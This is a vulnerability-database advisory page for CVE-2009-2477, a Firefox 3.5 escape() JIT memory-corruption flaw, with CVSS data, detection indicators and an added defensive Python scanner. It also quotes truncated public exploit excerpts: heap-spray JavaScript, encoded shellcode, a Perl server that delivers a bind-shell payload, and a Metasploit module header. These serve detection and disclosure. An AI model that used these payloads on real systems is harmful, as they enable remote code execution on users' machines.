CVE-2009-2477
Published 2009-07-15
Priority: P268 · Critical 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
ITW exploit · VulnCheck KEV
Exploited in the wild
EPSS: 42.69% (98.5th percentile)
js/src/jstracer.cpp in the Just-in-time (JIT) JavaScript compiler (aka TraceMonkey) in Mozilla Firefox 3.5 before 3.5.1 allows remote attackers to execute arbitrary code via certain use of the escape function that triggers access to uninitialized memory locations, as originally demonstrated by a document containing P and FONT elements.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | 3.5 (before 3.5.1) | 3.5.1 |
Detection & IOCs (extracted from sources)
IOC (bytes): %u0c0c%u0c0c
- Trigger is JavaScript use of the escape() function in the Firefox 3.5 JIT (TraceMonkey); look for HTML documents that combine <P> and <FONT> elements with escape() calls in script.
- The exploit is delivered in an HTTP response with Content-Type text/html; charset=utf-8; monitor for browser exploit pages serving heap-spray JavaScript with repeated %u0c0c%u0c0c NOP sleds.
- The heap spray uses 800 containers of block length 0x60000 filled with the 0x0c0c0c0c return address on Windows XP; flag large allocation loops in JavaScript built around repeated unescape('%u0c0c%u0c0c') patterns.
- The Metasploit module targets Firefox 3.5 only (ua_minver and ua_maxver are both '3.5'); User-Agent filtering on Firefox/3.5 can scope detections. Patched builds identify themselves as Firefox/3.5.1 and later, so match the bare 3.5 token rather than the 3.5 prefix.
- The exploit HTML uses randomised variable names but always contains a custom escapeData() function that iterates over the characters of its input, and a sprayready flag; look for this pair in script blocks.
- The vulnerability is specific to Firefox 3.5 before 3.5.1 and requires the JIT compiler (TraceMonkey) to be enabled; Firefox 3.5.1 and later are not affected. Mozilla's interim workaround was to disable the JIT by setting javascript.options.jit.content to false in about:config.
- The Metasploit module was only tested on Windows but notes it should work on other platforms; the Mac OS X target uses a different Ret value (0x41414141) and a much larger container count (800000), so heap-spray thresholds differ per platform.
- A related exploit (EDB-40936) targets Naenara Browser 3.5 (RedStar OS 3.0 Desktop), a North Korean Firefox fork built on the same vulnerable codebase; detection rules should account for this variant.
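The indicators above, turned into a scoring scanner that can run over proxy logs or a sandbox's captured HTTP responses. This is an added example, not code from this page, from the Metasploit module or from any vendor. The weights, the MIN_SPRAY_BLOCKS and ALERT_THRESHOLD cut-offs and the two sample pages are assumptions constructed for the demonstration; the exploit-like sample mirrors the parameters cited above (800 blocks of 0x60000 bytes, a %u0c0c%u0c0c sled, an escapeData() helper and a sprayready flag) without being any real exploit page.

```python
"""Heuristic scanner for CVE-2009-2477 exploit pages (added example)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# --- indicator patterns, one per IOC bullet above ---------------------------
# repeated 0x0c0c0c0c sled / return address built with unescape()
UNESCAPE_SLED_RE = re.compile(r"unescape\(\s*['\"](?:%u0c0c){2,}['\"]\s*\)", re.I)
# escape() call in script (not unescape); the JIT bug is reached through escape()
ESCAPE_CALL_RE = re.compile(r"(?<![\w.])escape\s*\(", re.I)
P_TAG_RE = re.compile(r"<p\b", re.I)
FONT_TAG_RE = re.compile(r"<font\b", re.I)
# counted loop such as "for (var j = 0; j < 800; ...)" -> group 2 is the bound
SPRAY_LOOP_RE = re.compile(r"for\s*\(\s*(?:var\s+)?(\w+)\s*=\s*0\s*;\s*\1\s*<\s*(\d+)\s*;")
# Metasploit module artefacts that survive its randomised variable names
ESCAPEDATA_RE = re.compile(r"function\s+escapeData\s*\(")
SPRAYREADY_RE = re.compile(r"\bsprayready\b")
# bare Firefox/3.5 only; patched builds report Firefox/3.5.1 and later
FF35_UA_RE = re.compile(r"Firefox/3\.5(?![\d.])")

MIN_SPRAY_BLOCKS = 100  # assumed threshold; the public exploit uses 800 on Windows
ALERT_THRESHOLD = 6     # assumed; tune against your own traffic


@dataclass
class Verdict:
    score: int = 0
    hits: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= ALERT_THRESHOLD

    def add(self, weight: int, tag: str) -> None:
        self.score += weight
        self.hits.append(tag)


def scan_response(headers: Dict[str, str], body: str,
                  user_agent: Optional[str] = None) -> Verdict:
    """Score one HTTP response body plus the requesting User-Agent, if known."""
    v = Verdict()
    hdrs = {k.lower(): val for k, val in headers.items()}
    if not hdrs.get("content-type", "").lower().startswith("text/html"):
        return v  # the exploit page is served as text/html; skip other types

    # 1. the 0x0c0c0c0c sled built with unescape()
    sled = UNESCAPE_SLED_RE.search(body) is not None
    if sled:
        v.add(4, "unescape_0c0c_sled")

    # 2. trigger shape: escape() in script plus <P> and <FONT> in the same document
    if ESCAPE_CALL_RE.search(body) and P_TAG_RE.search(body) and FONT_TAG_RE.search(body):
        v.add(3, "escape_p_font_trigger")

    # 3. a large counted loop only counts as a spray when the sled is present too
    bounds = [int(m.group(2)) for m in SPRAY_LOOP_RE.finditer(body)]
    if sled and bounds and max(bounds) >= MIN_SPRAY_BLOCKS:
        v.add(2, f"spray_loop:{max(bounds)}")

    # 4. Metasploit module artefacts
    if ESCAPEDATA_RE.search(body):
        v.add(3, "escapeData_function")
    if SPRAYREADY_RE.search(body):
        v.add(2, "sprayready_flag")

    # 5. scoping: the requesting browser is in the vulnerable range
    if user_agent and FF35_UA_RE.search(user_agent):
        v.add(1, "ua_firefox_3.5")
    return v


# --- constructed samples (not captured traffic) -----------------------------
FIREFOX_35_UA = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) "
                 "Gecko/20090624 Firefox/3.5")
HTML_HEADERS = {"Content-Type": "text/html; charset=utf-8"}

SAMPLE_EXPLOIT = """<html><body>
<p><font face="Arial">AAAAAAAA</font></p>
<script>
var sprayready = false;
function escapeData(data) {
  var out = '';
  for (var i = 0; i < data.length; i++) out += escape(data.charAt(i));
  return out;
}
var sled = unescape("%u0c0c%u0c0c");
while (sled.length < 0x60000) sled += sled;
var blocks = new Array();
for (var j = 0; j < 800; j++) blocks[j] = sled.substring(0, 0x60000 - 32);
sprayready = true;
</script></body></html>"""

SAMPLE_BENIGN = """<html><body><p>Search results</p>
<script>
var q = escape(document.location.hash);
for (var i = 0; i < 10; i++) { document.title = q; }
</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("exploit-like", SAMPLE_EXPLOIT), ("benign", SAMPLE_BENIGN)):
        v = scan_response(HTML_HEADERS, page, FIREFOX_35_UA)
        print(f"{name}: score={v.score} suspicious={v.suspicious} hits={v.hits}")
```

The sled carries most of the weight because a page that decodes %u0c0c%u0c0c through unescape() has almost no benign explanation, while escape() with P and FONT elements is common on ordinary pages and only scores in combination. The User-Agent check is deliberately a low-weight scoping signal: it narrows alerts to browsers in the vulnerable range (bare Firefox/3.5) without letting a forged or missing User-Agent suppress a detection.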
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.3 | CRITICAL | — |
| vendor_redhat | — | 9.3 | CRITICAL | — |
Red Hat
firefox 3.5 various flaws
vendor_redhat·2009-07-14·CVSS 9.3
GHSA
GHSA-p5fj-7pgr-xv7v: js/src/jstracer
ghsa_unreviewed·2022-05-02
Severity HIGH · CWE-94
VulnCheck
Mozilla Firefox Improper Control of Generation of Code ('Code Injection')
vulncheck·2009·CVSS 9.3
Affected: Mozilla Firefox
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
No detection rules found.
Exploit-DB
Naenara Browser 3.5 (RedStar 3.0 Desktop) - 'JACKRABBIT' Client-Side Command Execution
exploitdb·2016-12-18
---
```
n0m3rcYn0M3rCyn0m3Rc
N0MeRCYn0m3rCyn0m3rCyn0m
n0MERCypDK
var xunescape = unescape;
oneblock = xunescape("%u0040%u1000");
stackpivot = xunescape("%u6885%u0805%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u5a91%u0805%u4141%u4141");
nopsled = xunescape("%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8508%u0568%u8
```
Exploit-DB
Mozilla Firefox 3.5 - 'escape()' Return Value Memory Corruption (Metasploit)
exploitdb·2010-09-20
---
```ruby
##
# $Id: firefox_escape_retval.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Remote::BrowserAutopwn

	# Browser Autopwn fingerprint: only Firefox 3.5 on Windows receives the exploit
	autopwn_info({
		:ua_name    => HttpClients::FF,
		:ua_minver  => "3.5",
		:ua_maxver  => "3.5",
		:os_name    => OperatingSystems::WINDOWS,
		:javascript => true,
		:rank       => NormalRanking, # reliable memory corruption
		:vuln_test  => nil,
	})

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Firefox 3.5 escape() Return Value Memory Corruption',
			'Description'    => %q{
				This module exploits a memory corruption vulnerability in the Mozilla
				Firefox browser. This flaw occurs when a bug in the javascript
				interpreter fails to preserve the return value of the escape()
				function and results in uninitialized memory being used instead.
				This module has only been tested on Windows, but should work on
				other platforms as well with the current targets.
			},
```
Exploit-DB
Mozilla Firefox 3.5 - 'Font tags' Remote HeapSpray (2)
exploitdb·2009-07-20
---
```perl
#!/usr/bin/perl -w
##################################################
# FireFox 3.5 Heap Spray
# Discovered by: Simon Berry-Byrne
# Coded in Perl by netsoul, ALTO PARANA - Paraguay
# Contact: netsoul2 [at] gmail [dot] com
##################################################
use strict;
use POE::Component::Server::HTTP;

# Read the exploit page (everything after __DATA__) once and serve it on every request.
my $page = do { local $/; <DATA> };

my $port = 8080;
POE::Component::Server::HTTP->new(
    Port           => $port,
    ContentHandler => {
        "/" => sub {
            my ($request, $response) = @_;
            $response->push_header("Content-Type", "text/html");
            $response->content($page);
            return RC_OK;
        },
    },
);
print "[-] Listening on port $port...\n[-] Sending payload...\n[-] After 30 secs try with netcat to connect to port 5500\n";
POE::Kernel->run();

__DATA__
Exploiting Firefox 3.5
//windows - shell_bind_tcp - metasploit - encoding is shikata_ga_nai
var shel
```
Exploit-DB
Mozilla Firefox 3.5 - Font tags Remote Buffer Overflow
exploitdb·2009-07-13
CVE-2009-2478 Mozilla Firefox 3.5 - Font tags Remote Buffer Overflow
---
```
Firefox 3.5 Vulnerability
Firefox 3.5 Heap Spray Vulnerability
Author: SBerry aka Simon Berry-Byrne
Thanks to HD Moore for the insight and Metasploit for the payload
Loremipsumdoloregkuw
Loremipsumdoloregkuwiert
Loremikdkw
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u448
```
Metasploit
Firefox 3.5 escape() Return Value Memory Corruption
metasploit
This module exploits a memory corruption vulnerability in the Mozilla Firefox browser. This flaw occurs when a bug in the javascript interpreter fails to preserve the return value of the escape() function and results in uninitialized memory being used instead. This module has only been tested on Windows, but should work on other platforms as well with the current targets.
References
- http://blog.mozilla.com/security/2009/07/14/critical-javascript-vulnerability-in-firefox-35/
- http://isc.sans.org/diary.html?storyid=6796
- http://secunia.com/advisories/35798
- http://sunsolve.sun.com/search/document.do?assetkey=1-66-266148-1
- http://voices.washingtonpost.com/securityfix/2009/07/stopgap_fix_for_critical_firef.html
- http://www.exploit-db.com/exploits/9137
- http://www.exploit-db.com/exploits/9181
- http://www.h-online.com/security/First-Zero-Day-Exploit-for-Firefox-3-5--/news/113761
- http://www.kb.cert.org/vuls/id/443060
- http://www.mozilla.org/security/announce/2009/mfsa2009-41.html
- http://www.securityfocus.com/bid/35660
- http://www.vupen.com/english/advisories/2009/1868
- https://bugzilla.mozilla.org/show_bug.cgi?id=503286
- https://www.exploit-db.com/exploits/40936/
- https://www.redhat.com/archives/fedora-package-announce/2009-July/msg00909.html